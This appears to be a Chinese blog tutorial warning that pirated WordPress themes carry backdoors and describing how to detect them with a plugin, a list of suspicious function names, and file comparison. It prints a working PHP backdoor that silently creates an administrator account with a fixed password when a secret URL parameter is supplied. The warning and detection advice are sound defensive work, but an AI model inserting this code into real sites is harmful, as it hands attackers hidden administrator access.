技术教程:小心WordPress盗版主题里暗藏后门 干货

搜刮好东西分享简介:今天搜刮在整理某热门wordpress主题时,无意发现一个被加密的文件Core.class.php,从文件名称看是个核心类文件。被加密的核心类文件里面到底是暗藏什么猫腻呢?搜刮带着好奇心解密(如何解密?请看以前搜刮分享的文章《杂谈:优秀的php解密网站和工具网站推荐 干货》)了此文件并跟旧文件做了对比,终于发现了其中的猫腻——此文件暗藏后门。加后门者可以轻松的通过此后门获取你的网站权限,从而获取非法利益,所以我在这里要提醒一下新手们,从网上找主题一定要找开源的,最好是正版,如果是免费版,最好是在github有开源项目的主题,这样在一定程度上都会减少遇到后门的几率。

下面给大家看看这个常见的后门代码(也是我发现的这个)

add_action( ‘wp_head’, ‘wp_backdoor’ );
function wp_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’
) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘123456’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}

由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为backdoor,密码为123456的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台获得管理员权限,也就是说,网站后台被拿到shell,后果你可以自己想象一下。

所以搜刮在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版。

哪如何检测wordpress主题是否有后门呢?

第一种使用工具检测(插件检测)主题方法:

安装插件方法:

wordpress后台——外观——TAC——启动Theme Authenticity Checker安全检测插件

然后就会自动检测,如果出现全部为绿色,则表示没有任何后门

如果有异常请点击Details产看,并按照路径进行相关处理

第二种使用手动检测主题方法:

使用ftp工具查看源码:找到fuctions.php这个文件

查看是否包含以下函数:

function __popular_posts

function stripos

function scandir

function _getprepare_widget

add_action(“init”, “_getprepare_widget”);

function _get_allwidgets_cont

function strripos

function _checkactive_widgets

add_action(“admin_head”, “_checkactive_widgets”);

第三种使用文件同步对比法检测主题方法:

首先在wordpress官网下载跟你源码相同版本的代码

找到下载源码中的fuctions.php与你的程序源码的fuctions.php进行对比

对比的时候请注意,如果对比出现红色的可以询问相关技术人员,或者在网上进行搜索

对比推荐使用软件Beyond Compare 4点击进行文本对比即可

为TA充电
人已赞赏
wordpress教程

WordPress教程:无法安装这个包。PCLZIP_ERR_MISSING_FILE (-4) : Missing archive file

2020-10-30 7:52:46

wordpress教程

杂谈:WordPress性能优化加速五大方法:PHP MysqL优化等

2020-10-30 7:52:48

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索
  客服QQ:169403068